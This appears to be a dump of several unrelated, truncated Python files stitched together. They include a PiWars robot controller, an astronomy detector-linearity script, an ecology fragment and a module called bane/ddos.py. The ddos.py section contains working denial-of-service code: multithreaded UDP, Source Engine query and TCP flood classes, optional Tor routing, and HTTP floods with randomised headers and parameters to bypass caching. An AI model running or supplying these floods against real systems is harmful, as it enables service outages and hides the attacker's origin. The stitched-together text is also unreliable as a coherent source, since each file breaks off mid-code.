# result[newListIndex][year - baseYear] = relativeness
# currTopPhrases = []
# for center in centers:
# topKeyphrases = [ele[0] for ele in model.similar_by_vector(center, topn = 10)]
# currTopPhrases.append(topKeyphrases)
# topPhrases.append(currTopPhrases)
for fileName | |
<reponame>ForestFighters/PiWars2020
#!/usr/bin/env python
# coding: Latin-1
# Load library functions we want
import time
import sys
import gpiozero
import numpy as np
import cv2 as cv
#import picamera.array
from PIL import Image
from camera import Camera
from robot import Robot
from approxeng.input.selectbinder import ControllerResource
from argparse import ArgumentParser
import logging
import os
from time import sleep
from rectangle import Rectangle
#from picamera import PiCamera
from picamera.array import PiRGBArray
from picamera.array import PiYUVArray
# COLOURS = {
# "red": ([-10,80,30],[10,255,255]),
# "green": ([50,80,30],[70,255,255]),
# "blue": ([110,80,30],[130,255,255]),
# }
seconds = lambda: int(round(time.time()))
INTERVAL = 0.0
LOGGER = logging.getLogger(__name__)
class Controller():
mode = None
button = 0
def __init__(self):
self.last_text = ''
self.bot = Robot()
interval = 0.0
self.w = 320
self.h = 240
self.camera = Camera(self.w, self.h)
super().__init__()
def run(self):
self.show('Started')
cv.namedWindow('image', cv.WND_PROP_FULLSCREEN)
cv.setWindowProperty('image',cv.WND_PROP_FULLSCREEN,cv.WINDOW_FULLSCREEN)
menu_img = self.loadMenuImage('/home/pi/Pictures/Menu.jpg')
notfound_img = self.loadMenuImage('/home/pi/Pictures/Joystick.jpg')
camera_img = self.loadMenuImage('/home/pi/Pictures/Camera.jpg')
remote_img = self.loadMenuImage('/home/pi/Pictures/Remote-Controlled.jpg')
lava_img = self.loadMenuImage('/home/pi/Pictures/Lava-Palava.jpg')
mine_img = self.loadMenuImage('/home/pi/Pictures/Minesweeper.jpg')
maze_img = self.loadMenuImage('/home/pi/Pictures/Maze.jpg')
exit_img = self.loadMenuImage('/home/pi/Pictures/Exit.jpg')
halt_img = self.loadMenuImage('/home/pi/Pictures/Halt.jpg')
test_img = self.loadMenuImage('/home/pi/Pictures/Testing.jpg')
track_img = self.loadMenuImage('/home/pi/Pictures/Track.jpg')
reboot_img = self.loadMenuImage('/home/pi/Pictures/Reboot.jpg')
gear = 2
menu = 1
MIN_MENU = 1
MAX_MENU = 8
running = True
timing = 20000
while running:
try:
self.show('Press CTRL+C to quit')
self.showMenuImage(menu_img)
cv.waitKey(1)
with ControllerResource() as joystick:
if joystick.connected :
# Set previous menu item
prev = 0
menu = 1
# Loop indefinitely
while running:
presses = joystick.check_presses()
if presses.select:
# Ensure we have the camera attached for this challenges
if (menu == 2 or menu == 3 or menu == 4) and (self.camera.hasCamera == False):
self.showMenuImage(camera_img)
elif menu == 7:
self.testing(test_img)
prev = 7
else:
self.showMenuImage(menu_img)
running = self.doMenu( menu, joystick, gear, test_img)
if menu == 1:
self.showMenuImage(remote_img)
if menu == 2:
self.showMenuImage(lava_img)
if menu == 3:
self.showMenuImage(mine_img)
if menu == 4:
self.showMenuImage(maze_img)
if menu == 5:
self.showMenuImage(exit_img)
if menu == 6:
self.showMenuImage(halt_img)
if menu == 7:
self.showMenuImage(test_img)
if menu == 8:
self.showMenuImage(reboot_img)
prev = 0
if joystick.presses.dright:
menu += 1
if menu > MAX_MENU:
menu = MIN_MENU
if joystick.presses.dleft:
menu -= 1
if menu < MIN_MENU:
menu = MAX_MENU
if prev != menu:
#print(" Menu = {}".format(menu))
if menu == 1:
self.showMenuImage(remote_img)
if menu == 2:
self.showMenuImage(lava_img)
if menu == 3:
self.showMenuImage(mine_img)
if menu == 4:
self.showMenuImage(maze_img)
if menu == 5:
self.showMenuImage(exit_img)
if menu == 6:
self.showMenuImage(halt_img)
if menu == 7:
self.showMenuImage(test_img)
if menu == 8:
self.showMenuImage(reboot_img)
prev = menu
# Select menu option
# time.sleep(INTERVAL)
except IOError:
LOGGER.info('Unable to find joystick')
self.showMenuImage(notfound_img)
time.sleep(4.0)
except KeyboardInterrupt:
# CTRL+C exit, disable all drives
self.bot.move(0, 0)
self.show('Motors off')
break
cv.destroyAllWindows()
def doMenu(self, menu, joystick, gear, image ):
if menu == 1:
self.remoteNoCamera( joystick, gear )
return True
if menu == 2:
self.straight( joystick, gear )
return True
if menu == 3:
self.mine( joystick, gear )
return True
if menu == 4:
self.maze( joystick, gear, image )
return True
if menu == 5:
return False
if menu == 6:
self.shutdown()
# We don't expect to get here
return False
if menu == 7:
self.testing(image)
return True
if menu == 8:
self.reboot()
# We don't expect to get here
return False
def reboot(self):
self.show("Reboot")
os.system("sudo reboot")
def shutdown(self):
self.show("Shutdown")
os.system("sudo halt")
def testing(self, image):
image = self.loadMenuImage('/home/pi/Pictures/Testing.jpg')
temp = self.bot.temperature()
volts = self.bot.battery()
cv.putText(image,temp,(50, 60), cv.FONT_HERSHEY_TRIPLEX, 2, (0, 0, 255), 5)
cv.putText(image,volts,(50, 120), cv.FONT_HERSHEY_TRIPLEX, 2, (0, 0, 255), 5)
self.showMenuImage(image)
# Pi Noon, Zombie Shoot, Temple of Doom, Eco Disaster
def remoteNoCamera(self, joystick, gear):
self.show("Remote no Camera mode")
self.bot.servo_off()
count = 0
while True:
presses = joystick.check_presses()
if presses.home:
#self.show('HOME pressed since last check')
running = False
break
count += 1
left_drive = joystick.ly
right_drive = joystick.ry
self.bot.move(left_drive, right_drive, gear)
if joystick.presses.cross:
self.bot.trigger( 90 )
time.sleep(0.25)
if joystick.presses.triangle:
self.bot.trigger( -90 )
time.sleep(0.25)
if joystick.presses.dup:
self.bot.tilt( 30 )
time.sleep(0.25)
if joystick.presses.ddown:
self.bot.tilt( -30 )
time.sleep(0.25)
self.bot.servo_off()
prev = gear
if joystick.presses.l1:
gear += 0.5
if joystick.presses.r1:
gear -= 0.5
if gear < 1:
gear = 1
if gear > 5:
gear = 5
if gear != prev:
print(" Gear = {}".format(gear))
self.bot.move(left_drive, right_drive, gear)
self.bot.stop()
def remoteWithCamera(self, joystick, gear):
self.show("Remote with Camera mode")
if self.camera.hasCamera == False:
return
rawCapture = PiRGBArray( self.camera, size=(self.w, self.h))
time.sleep(0.1)
count = 0
for frame in self.camera.CaptureContinous(rawCapture):
presses = joystick.check_presses()
if presses.home:
#self.show('HOME pressed since last check')
running = False
break
image = frame.array
heading, roll, pitch = self.bot.readEuler()
distance = self.bot.getDistance()
count = 0
text = "gear={0} : angle={1:5.2} : mm={2}".format(gear, heading, distance)
cv.putText(image,text,(10, 20), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255))
count += 1
left_drive = joystick.ly
right_drive = joystick.ry
self.bot.move(left_drive, right_drive, gear)
if joystick.presses.cross:
self.bot.trigger( 90 )
if joystick.presses.triangle:
self.bot.trigger( -90 )
if joystick.presses.dup:
self.bot.tilt( -10 )
if joystick.presses.ddown:
self.bot.tilt( 10 )
if joystick.presses.dright:
self.bot.pan( -5 )
if joystick.presses.dleft:
self.bot.pan( 5 )
prev = gear
if joystick.presses.l1:
gear += 0.5
if joystick.presses.r1:
gear -= 0.5
if gear < 1:
gear = 1
if gear > 5:
gear = 5
#if gear != prev:
# print(" Gear = {}".format(gear))
self.showMenuImage(image)
rawCapture.truncate(0)
self.bot.move(left_drive, right_drive, gear)
self.bot.stop()
def maze(self, joystick, gear, image):
self.show("Escape Route mode")
image = self.loadMenuImage('/home/pi/Pictures/Track.jpg')
#if self.camera.hasCamera == False:
# return
#rawCapture = PiRGBArray( self.camera, size=(self.w, self.h))
#time.sleep(0.1)
# State 0
# Travel until 276
# State 1
# Turn to 90
# State 2
# Travel until 174
# State 3
# Turn to 180
# State 4
# Travel until 276
# State 5
# Turn to 90
# State 6
# Travel until 174
# State 7
# Turn to 0
# State 8
# Travel to 276
# State 9
# Turn to 90
# State 10
# Travel until 100
left_drive = 1
right_drive = 1
firsttime = True
offset = 0
gear = 2
state = 0
running = False
count = 0
turn_speed = 0.8
target = 0.0
adjust = 0.0
while True:
# for frame in self.camera.CaptureContinous(rawCapture):
presses = joystick.check_presses()
if presses.home:
running = False
break
if presses.start:
running = not running
#image = frame.array
# Read the Euler angles for heading, roll, pitch (all in degrees).
heading, roll, pitch = self.bot.readEuler()
distance = self.bot.getDistance()
# If heading just less than 360 then create an offset
if firsttime and heading > 270:
offset = 360 - heading
firsttime = False
# heading += offset
# Target 0/360
if state == 0 and distance > 276:
adjust, left_drive, right_drive = self.getAdjustedDrive( 0.0, heading, distance )
elif state == 0 and distance <= 276:
# Red 438, 434 - 208, 434
cv.line(image, (438, 434),( 208, 434), (0,0,255),5)
left_drive = 0
right_drive = 0
state = 1
# Turn Right - Target 90
elif state == 1 and (heading > 270 or heading < 90 ):
left_drive = turn_speed
right_drive = -turn_speed
elif state == 1 and (heading >= 90 and heading < 180):
left_drive = 0
right_drive = 0
cv.circle(image, (208, 434), 8, (255,0,0),8)
state = 2
elif state == 2 and distance > 174:
adjust, left_drive, right_drive = self.getAdjustedDrive( 90.0, heading, distance )
elif state == 2 and distance <= 174:
# 208, 434 - 208, 298
cv.line(image, (208, 434),( 208, 298), (0,0,255),5)
left_drive = 0
right_drive = 0
state = 3
# Turn Right - Target 180
elif state == 3 and heading < 180:
left_drive = turn_speed
right_drive = -turn_speed
elif state == 3 and heading >= 180:
left_drive = 0
right_drive = 0
cv.circle(image, (208, 298), 8, (255,0,0),8)
state = 4
elif state == 4 and distance > 100:
adjust, left_drive, right_drive = self.getAdjustedDrive( 180.0, heading, distance )
elif state == 4 and distance <= 100:
# 208, 298 - 404, 298
cv.line(image, (208, 298),( 404, 298), (0,0,255),5)
left_drive = 0
right_drive = 0
state = 5
# Turn Left - Target 90
elif state == 5 and heading > 90:
left_drive = -turn_speed
right_drive = turn_speed
elif state == 5 and heading <= 90:
left_drive = 0
right_drive = 0
cv.circle(image, (404, 298), 8, (255,0,0),8)
state = 6
elif state == 6 and distance > 174:
adjust, left_drive, right_drive = self.getAdjustedDrive( 90.0, heading, distance )
elif state == 6 and distance <= 174:
# 404, 298 - 404, 142
cv.line(image, (404, 298),( 404, 142), (0,0,255),5)
left_drive = 0
right_drive = 0
state = 7
# Turn Left - Target 0/360
elif state == 7 and ( heading >= 0 and heading < 90 ):
left_drive = -turn_speed
right_drive = turn_speed
elif state == 7 and ( heading >= 270 and heading <= 360 ):
left_drive = 0
right_drive = 0
cv.circle(image, (404, 142), 8, (255,0,0),8)
state = 8
elif state == 8 and distance > 276:
adjust, left_drive, right_drive = self.getAdjustedDrive( 0.0, heading, distance )
elif state == 8 and distance <= 276:
# 404, 142 - 220, 142
cv.line(image, (404, 142),( 220, 142), (0,0,255),5)
left_drive = 0
right_drive = 0
state = 9
# Turn Right - Target 90+ diff
elif state == 9 and (heading > 270 or heading < 90):
left_drive = turn_speed
right_drive = -turn_speed
elif state == 9 and heading >= 90:
left_drive = 0
right_drive = 0
cv.circle(image, (220, 142), 8, (255,0,0),8)
state = 10
elif state == 10:
# 220, 142 - 220, 56
cv.line(image, (220, 142),( 220, 56), (0,0,255),5)
adjust, left_drive, right_drive = self.getAdjustedDrive( 90.0, heading, distance )
drive = "FWD"
if left_drive < right_drive:
drive = "LFT"
elif left_drive > right_drive:
drive = "RGT"
cv.rectangle(image,(0,0),(640,50),(0,0,0),-1);
text = "st={0} {1:.2f}({2:.2f}) {3}mm {4}".format(state, heading, adjust, distance, drive)
cv.putText(image,text,(10, 30), cv.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255))
self.showMenuImage(image)
#rawCapture.truncate(0)
if running:
self.bot.move(left_drive, right_drive, gear)
else:
self.bot.stop()
time.sleep(self.bot.getInterval())
self.bot.stop()
cv.namedWindow('image', cv.WND_PROP_FULLSCREEN)
cv.setWindowProperty('image',cv.WND_PROP_FULLSCREEN,cv.WINDOW_FULLSCREEN)
cv.waitKey(10)
def mine(self, joystick, gear):
self.show("Mine Sweeper mode")
if self.camera.hasCamera == False:
return
hw = int(self.w//2)
hh = int(self.h//2)
rawCapture = PiRGBArray( self.camera, size=(self.w, self.h))
time.sleep(0.1)
showImage = 0
colour = np.array([0, 0, 0])
lower = np.array([110,38,34])
upper = np.array([130,255,255])
#colour_arrays = COLOURS["red"]
#lower = np.array(colour_arrays[0], dtype = "uint8")
#upper = np.array(colour_arrays[1], dtype = "uint8")
brightness = self.camera.Brightness
running = False
mode = 0
states = ["Hunting","Driving","Sleeping","Reversing"]
xPos = 0
yPos = 0
angle = 45
diff = 10
gear = 2
state = 0
frameNo = 1.0
start = seconds()
for frame in self.camera.CaptureContinous(rawCapture):
presses = joystick.check_presses()
if presses.home:
running = False
break
if presses.start:
xPos = -1
yPos = -1
angle = 45
diff = 0
mode = 0
running = True
if joystick.presses.dup:
self.bot.tilt( -10 )
time.sleep(0.5)
elif joystick.presses.ddown:
self.bot.tilt( 10 )
time.sleep(0.5)
elif joystick.presses.dright:
self.bot.pan( -5 )
time.sleep(0.5)
elif joystick.presses.dleft:
self.bot.pan( 5 )
time.sleep(0.5)
else:
self.bot.servo_off()
yPos = self.h - int(((joystick.ly + 1) * self.h)/2)
xPos = int(((joystick.lx + 1) * self.w)/2)
yPos = min(self.h - 1, yPos)
xPos = min(self.w - 1, xPos)
# Take image
image = | |
<filename>bane/ddos.py
import requests, cfscrape, socks, os, sys, urllib, socket, random, time, threading, ssl
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# import the dependencies for each python version
if sys.version_info < (3, 0):
# Python 2.x
import httplib
import urllib2
from scapy.config import conf
conf.ipv6_enabled = False
from scapy.all import *
else:
# Python 3.x
import http.client
httplib = http.client
import urllib.request
urllib2 = urllib.request
from kamene.config import conf
conf.ipv6_enabled = False
from kamene.all import *
from struct import *
from bane.iot import getip
from bane.payloads import *
from bane.proxer import *
if os.path.isdir("/data/data") == True:
adr = True # the device is an android
if os.path.isdir("/data/data/com.termux/") == True:
termux = True # the application which runs the module is Termux
if (termux == False) or (adr == False):
from bane.swtch import *
def reorder_headers_randomly(s):
b = s.split("\r\n\r\n")[1]
a = s.split("\r\n\r\n")[0]
m = a.split("\r\n")[0]
c = a.split("\r\n")[1:]
random.shuffle(c)
return m + "\r\n" + "\r\n".join(c) + "\r\n\r\n" + b
def random_param():
a = random.randint(1, 2)
if a == 1:
return str(random.randint(1, 1000))
else:
return random.choice(lis)
def setup_http_packet(
target,
ty,
paths,
post_field_min,
post_field_max,
post_min,
post_max,
cookie,
user_agents,
):
pa = random.choice(paths) # bypassing cache engine
q = ""
for i in range(random.randint(2, 5)):
q += random_param() + random_param()
p = ""
for i in range(random.randint(2, 5)):
p += random_param() + random_param()
if "?" in pa:
jo = "&"
else:
jo = "?"
pa += jo + q + "=" + p
# setting random headers
for l in range(random.randint(1, 5)):
ed = random.choice(ec)
oi = random.randint(1, 3)
if oi == 2:
gy = 0
while gy < 1:
df = random.choice(ec)
if df != ed:
gy += 1
ed += ", "
ed += df
l = random.choice(al)
for n in range(random.randint(0, 5)):
l += ";q={},".format(round(random.uniform(0.1, 1), 1)) + random.choice(al)
kl = random.randint(1, 2)
ck = ""
if cookie:
ck = "Cookie: " + cookie + "\r\n"
if ty == 1:
m = "GET {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept: {}\r\nAccept-Language: {}\r\nAccept-Encoding: {}\r\nAccept-Charset: {}\r\nKeep-Alive: {}\r\nConnection: Keep-Alive\r\nCache-Control: {}\r\nReferer: {}\r\nHost: {}\r\n\r\n".format(
pa,
ck,
random.choice(user_agents),
random.choice(a),
l,
ed,
random.choice(ac),
random.randint(100, 1000),
random.choice(cc),
(
random.choice(referers)
+ random.choice(lis)
+ str(random.randint(0, 100000000))
+ random.choice(lis)
),
target,
)
else:
k = ""
for _ in range(random.randint(post_field_min, post_field_max)):
k += random.choice(lis)
j = ""
for x in range(random.randint(post_min, post_max)):
j += random.choice(lis)
par = k + "=" + j
m = "POST {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept-language: {}\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: {}\r\nHost: {}\r\n\r\n{}".format(
pa,
ck,
random.choice(user_agents),
l,
random.randint(300, 1000),
len(par),
(
random.choice(referers)
+ random.choice(lis)
+ str(random.randint(0, 100000000))
+ random.choice(lis)
),
target,
par,
)
return reorder_headers_randomly(m)
def get_public_dns(timeout=15):
try:
return (
requests.get(
"https://public-dns.info/nameservers.txt", timeout=timeout
).text
).split("\n")
except:
return []
def reset(): # reset all values
global counter
counter = 0
global stop
stop = False
global coo
coo = False
global ual
ual = []
global flag
flag = -1
global ier
ier = 0
global pointer
pointer = 0
global ue
ue = []
"""
the following classes are for DoS attacks simulations with different tools that have been either originally written in
diffferent languages (Perl: slowloris and C: xerxes and slow_read attack...) and rewritten in python and other python tools that are PoC for
some vulnerabilities (slow post attacks, hulk) with some modifications that has improved their performance!!!
"""
class udp_flood:
def __init__(
self,
u,
p=80,
threads_daemon=True,
interval=0.001,
min_size=10,
max_size=10,
connection=True,
duration=60,
threads=1,
limiting=True,
logs=False,
):
self.target = u
self.port = p
self.interval = interval
self.min_size = min_size
self.max_size = max_size
self.connection = connection
self.duration = duration
self.limiting = limiting
self.logs = logs
self.stop = False
self.counter = 0
self.start = time.time()
for x in range(threads):
try:
t = threading.Thread(target=self.attack)
t.daemon = threads_daemon
t.start()
except:
pass
def attack(self):
try:
time.sleep(1)
tm = time.time()
size = 0
while True:
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if self.connection == True:
s.connect((self.target, self.port))
msg = ""
for x in range(random.randint(self.min_size, self.max_size)):
msg += random.choice(lis)
if len(msg) > 1400:
msg = msg[
0:1400
] # make sure all payloads' sizes are on the right range
s.sendto((msg.encode("utf-8")), (self.target, self.port))
size += len(msg)
self.counter += 1
if (self.logs == True) and (int(time.time() - tm) == 1):
sys.stdout.write(
"\rPackets: {} | Bytes/s: {} ".format(self.counter, size)
)
sys.stdout.flush()
tm = time.time()
size = 0
if self.limiting == True:
time.sleep(self.interval)
except:
try:
time.sleep(self.interval)
except:
pass
self.kill()
except:
pass
def done(self):
if "stop" in dir(self):
return False
return True
def reset(self):
l = []
for x in self.__dict__:
self.__dict__[x] = None
l.append(x)
for x in l:
delattr(self, x)
def kill(self):
self.stop = True
a = self.__dict__["counter"]
self.reset() # this will kill any running threads instantly by setting all the attacking information to "None" and cause error which is handled with the "try...except..." around the main while loop
return a
class vse_flood:
def __init__(
self,
u,
p=80,
threads_daemon=True,
interval=0.001,
connection=True,
duration=60,
threads=1,
limiting=True,
logs=False,
):
self.target = u
self.port = p
self.payload = b"\xff\xff\xff\xffTSource Engine Query\x00" # read more at https://developer.valvesoftware.com/wiki/Server_queries
self.interval = interval
self.connection = connection
self.duration = duration
self.limiting = limiting
self.logs = logs
self.stop = False
self.counter = 0
self.start = time.time()
for x in range(threads):
try:
t = threading.Thread(target=self.attack)
t.daemon = threads_daemon
t.start()
except:
pass
def attack(self):
try:
time.sleep(1)
tm = time.time()
while True:
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if self.connection == True:
s.connect((self.target, self.port))
s.sendto(self.payload, (self.target, self.port))
self.counter += 1
if (self.logs == True) and (int(time.time() - tm) == 1):
sys.stdout.write("\rPackets: {} ".format(self.counter))
sys.stdout.flush()
tm = time.time()
if self.limiting == True:
time.sleep(self.interval)
except:
pass
try:
time.sleep(self.interval)
except:
pass
self.kill()
except:
pass
def done(self):
if "stop" in dir(self):
return False
return True
def reset(self):
l = []
for x in self.__dict__:
self.__dict__[x] = None
l.append(x)
for x in l:
delattr(self, x)
def kill(self):
if "stop" in dir(self):
self.stop = True
a = self.__dict__["counter"]
self.reset()
return a
class tcp_flood:
def __init__(
self,
u,
p=80,
threads_daemon=True,
min_size=10,
max_size=50,
threads=256,
timeout=5,
round_min=1000,
round_max=10000,
interval=0.001,
duration=60,
logs=False,
tor=False,
):
self.logs = logs
self.stop = False
self.counter = 0
self.start = time.time()
self.target = u
self.duration = duration
self.port = p
self.timeout = timeout
self.tor = tor
self.min_size = min_size
self.max_size = max_size
self.interval = interval
self.round_min = round_min
self.round_max = round_max
for x in range(threads):
try:
t = threading.Thread(target=self.attack)
t.daemon = threads_daemon
t.start()
except:
pass
def attack(self):
try:
time.sleep(1) # give time for all threads to be created
while True:
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if self.stop == True:
break
try:
s = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
if self.tor == False:
s.settimeout = (
self.timeout
) # we can't set timeout with socks module if we are going to use a socks proxy
if self.tor == True:
s.setproxy(
socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050, True
) # let the traffic go through tor
s.connect((self.target, self.port)) # connect to target
if (self.port == 443) or (self.port == 8443):
s = ssl.wrap_socket(
s, ssl_version=ssl.PROTOCOL_TLSv1
) # use ssl if needed on specific ports
for l in range(
random.randint(self.round_min, self.round_max)
): # send packets with random number of times for each connection (number between "round_min" and "round_max")
if (
int(time.time() - self.start) >= self.duration
): # this is a safety mechanism so the attack won't run forever
break
if stop == True:
break
m = ""
for li in range(
random.randint(self.min_size, self.max_size)
): # each payload' size is chosen randomly between maximum and minimum values
m += random.choice(lis)
try:
if stop == True:
break
s.send(m.encode("utf-8"))
self.counter += 1
if self.logs == True:
sys.stdout.write(
"\rPackets: {} | Bytes: {} ".format(
self.counter, len(m)
)
)
sys.stdout.flush()
# print("Packets: {} | Bytes: {}".format(tcp_counter,len(m)))
time.sleep(self.interval)
except:
break
time.sleep(self.interval)
s.close()
except:
pass
time.sleep(0.1)
self.kill()
except:
pass
| |
<filename>nirlin.py
#!/usr/bin/env python
# 2007 Aug 27 - <NAME> - alpha version
# 2007 Aug 28 - AWS - beta version
# 2007 Sep 20 - AWS - new coefficients based on spectroscopic flats
# 2008 Feb 12 - AWS - handle coadds & nprepared data
# 2008 Feb 12 - AWS - default output naming to match Gemini IRAF convention
# 2008 Feb 12 - AWS - add .fits extension if not given
# 2008 Feb 14 - AWS - new coefficients based on average count rate
# 2008 Apr 15 - AWS - new coefficients based on new model
# 2008 Apr 25 - AWS - include y-position coefficients
# 2008 Oct 21 - AWS - update coefficients derived with low-flux data
# 2008 Oct 23 - AWS - include high-flux (phot) and full-range flux (spec) coefficients
# 2008 Oct 24 - AWS - handle NaN, Inf, and negative corrections
# 2008 Oct 29 - AWS - settle on three best sets of shallow-well coefficients
# 2008 Nov 03 - AWS - set minimum counts for correction = 10 ADU
# 2008 Dec 07 - AWS - add HRN Deep-well coefficients and max count limits
# 2009 Jan 05 - AWS - set uncorrectable pixels to BADVAL
# 2009 Jan 09 - AWS - add option to force correction outside recommended range
# 2009 Jan 13 - AWS - check that this script has not already been run
# 2009 May 22 - AWS - verify FITS header to catch old images with unquoted release date string
# 2010 Jun 18 - <NAME> - new coefficients for subarrays based on average count rate
# 2010 Jul 19 - NTL - modified coefficients for MRN-1024-Shallow, now correct down to 1 count
# 2010 Aug 24 - NTL - coefficients from SVD fit are now included
# 2010 Sep 26 - AWS - include med-RN 256 shallow-well
# 2010 Nov 22 - AWS - include high-RN 1024 deep and shallow-well; multiply by coadds at end
# 2013 Apr 11 - AWS - multiply exposure time of nprepared images by the number of coadds
# 2013 Jun 24 - AWS - convert history list to a string before searching it
#-----------------------------------------------------------------------
import datetime
import getopt
import glob
import numpy
import os
import pyfits
import sys
version = '2013 Jun 24'
#-----------------------------------------------------------------------
def usage():
print ''
print 'NAME'
print ' nirlin.py - NIR linearization\n'
print 'SYNOPSIS'
print ' nirlin.py [options] infile\n'
print 'DESCRIPTION'
print ' Run on raw or nprepared Gemini NIRI data, this'
print ' script calculates and applies a per-pixel linearity'
print ' correction based on the counts in the pixel, the'
print ' exposure time, the read mode, the bias level and the'
print ' ROI. Pixels over the maximum correctable value are'
print ' set to BADVAL unless given the force flag.'
print ' Note that you may use glob expansion in infile,'
print ' however, any pattern matching characters (*,?)'
print ' must be either quoted or escaped with a backslash.'
print ' '
print 'OPTIONS'
print ' -b <badval> : value to assign to uncorrectable pixels [0]'
print ' -f : force correction on all pixels'
print ' -o <file> : write output to <file> [l<inputfile>]'
print ' If no .fits is included this is assumed to be a directory'
print ' -v : verbose debugging output\n'
print 'VERSION'
print ' ', version
print ''
raise SystemExit
#-----------------------------------------------------------------------
def main():
try:
opts,_ = getopt.getopt(sys.argv[1:], 'b:fo:v')
except getopt.GetoptError:
usage()
sys.exit(2)
nargs = len(sys.argv[1:])
nopts = len(opts)
badval = 0
force = False
outputfile = 'default'
verbose = False
for o, a in opts:
if o in ('-b'): # value for bad pixels (over correction limit)
badval = a
nopts += 1
if o in ('-f'): # force correction on all pixels, even if over limit
force = True
if o in ('-o'): # linearized output file
outputfile = a
nopts += 1
if o in ('-v'): # verbose debugging output
verbose = True
if (verbose):
print "...nargs = ", nargs
print "...nopts = ", nopts
if (nargs - nopts) != 1:
usage()
inputfile = sys.argv[nopts+1]
files = glob.glob(inputfile)
if (verbose):
print '...files = ', files
for f in files:
nirlin(f,badval=badval,force=force,outputfile=outputfile,verbose=verbose)
#-----------------------------------------------------------------------
def getCoefficients(naxis2, welldepth, readmode, force=False):
if readmode == 'low-noise' and naxis2 == 1024 and welldepth == 'shallow':
maxcounts = 12000
dt = 1.2662732
g = 7.3877618e-06
e = 1.940645271e-10
params = (dt,g,e)
elif readmode == 'medium-noise' and naxis2 == 1024 and welldepth == 'shallow':
maxcounts = 12000
dt = 0.09442515154
g = 3.428783846e-06
e = 4.808353308e-10
params = (dt,g,e)
elif readmode == 'medium-noise' and naxis2 == 256 and welldepth == 'shallow':
maxcounts = 12000
dt = 0.01029262589
g = 6.815415667e-06
e = 2.125210479e-10
params = (dt,g,e)
elif readmode == 'high-noise' and naxis2 == 1024 and welldepth == 'shallow':
maxcounts = 12000
dt = 0.009697324059
g = 3.040036696e-06
e = 4.640788333e-10
params = (dt,g,e)
elif readmode == 'high-noise' and naxis2 == 1024 and welldepth == 'deep':
maxcounts = 21000
dt = 0.007680816203
g = 3.581914163e-06
e = 1.820403678e-10
params = (dt,g,e)
else:
print 'ERROR: coefficients do not exist for this mode.'
print 'Please contact Gemini Observatory for more information.'
sys.exit(2)
if force:
maxcounts = 65000
print '...forcing linearity correction on all pixels'
else:
print '...upper limit for linearization =', maxcounts, 'ADU/coadd'
return maxcounts,params
#-----------------------------------------------------------------------
def getSVDCorrection(counts, gamma, eta):
return counts + gamma*counts**2 + eta*counts**3
#-----------------------------------------------------------------------
def nirlin(inputfile, badval=0, force=False, outputfile='default', verbose=False):
print 'NIRLIN v.', version
# Check file names
if not inputfile.endswith('.fits'):
inputfile = inputfile + '.fits'
if outputfile == 'default':
#outputfile = os.path.join(os.path.dirname(inputfile), 'l' + os.path.basename(inputfile))
outputfile = 'l' + os.path.basename(inputfile)
else:
if ( not outputfile.endswith('.fits') ):
# outputfile = outputfile + '.fits'
if not os.path.isdir(outputfile):
os.mkdir(outputfile)
outputfile = outputfile + '/l' + os.path.basename(inputfile)
if verbose:
print '...output = ', outputfile
# Error checking:
if not os.path.exists(inputfile): # check whether input file exists
print inputfile, 'does not exist'
sys.exit(2)
if os.path.exists(outputfile): # check whether output file exists
print '...removing old', outputfile
os.remove(outputfile)
print '...reading', inputfile
hdulist = pyfits.open(inputfile)
print '...verifying...'
if verbose:
hdulist.verify('fix')
else:
hdulist.verify('silentfix')
# Check if this image has already been linearized:
try:
history = hdulist[0].header['HISTORY']
except:
history = ''
if verbose:
print '...history = ', history
if str(history).count("Linearized by nirlin.py") > 0:
print "ERROR: ", history
sys.exit(2)
# Get the number of extensions in the image:
next = len(hdulist)
if verbose:
print '...number of extensions =', next
if next == 1:
sci = 0
else:
sci = 1
if verbose:
print '...assuming science data are in extension', sci
# Get the image dimensions:
try:
naxis1,naxis2 = hdulist[sci].header['NAXIS1'],hdulist[sci].header['NAXIS2']
print '...image dimensions =', naxis1, 'x', naxis2
except:
print 'ERROR: cannot get the dimensions of extension ', sci
pyfits.info(inputfile)
sys.exit(2)
exptime = hdulist[0].header['EXPTIME']
print '...input exposure time =', exptime, 's'
# Check that exposure time is in range:
if exptime > 600:
print 'WARNING: exposure time is outside the range used to derive correction.'
# Read science data:
counts = hdulist[sci].data
if verbose:
print 'INPUT DATA:'
print counts
print '...mean of input image =', numpy.mean(counts)
# Convert to counts / coadd:
coadds = hdulist[0].header['COADDS']
print '...number of coadds =', coadds
if coadds > 1:
print '...converting to counts / coadd...'
counts = counts / coadds
# Nprepare modifies the exposure time keyword value to be exptime * ncoadds
# so if nprepared, undo this operation to get the original exposure time:
nprepared = False
try:
hdulist[0].header['PREPARE']
print '...image has been nprepared'
nprepared = True
except:
if verbose:
print '...image has not been nprepared (which is okay)'
if nprepared and coadds > 1:
print '...converting to exptime / coadd...'
exptime = exptime / coadds
print '...exptime = ', exptime
# Read mode:
lnrs = hdulist[0].header['LNRS']
print '...number of low noise reads =', lnrs
ndavgs = hdulist[0].header['NDAVGS']
print '...number of digital averages =', ndavgs
if ( lnrs == 1 and ndavgs == 1 ):
readmode = 'high-noise'
elif ( lnrs == 1 and ndavgs == | |
380 ppm
fCO2 = 1.0 - 0.387 * np.log(CO2 / 380.0)
# leaf level light-saturated gs (m/s)
gs = np.minimum(1.6*(1.0 + g1 / np.sqrt(D))*Amax / 380. / rhoa, 0.1) # large values if D -> 0
# canopy conductance
Gc = gs * fQ * Rew * fCO2 * fPheno
Gc[np.isnan(Gc)] = eps
""" --- transpiration rate --- """
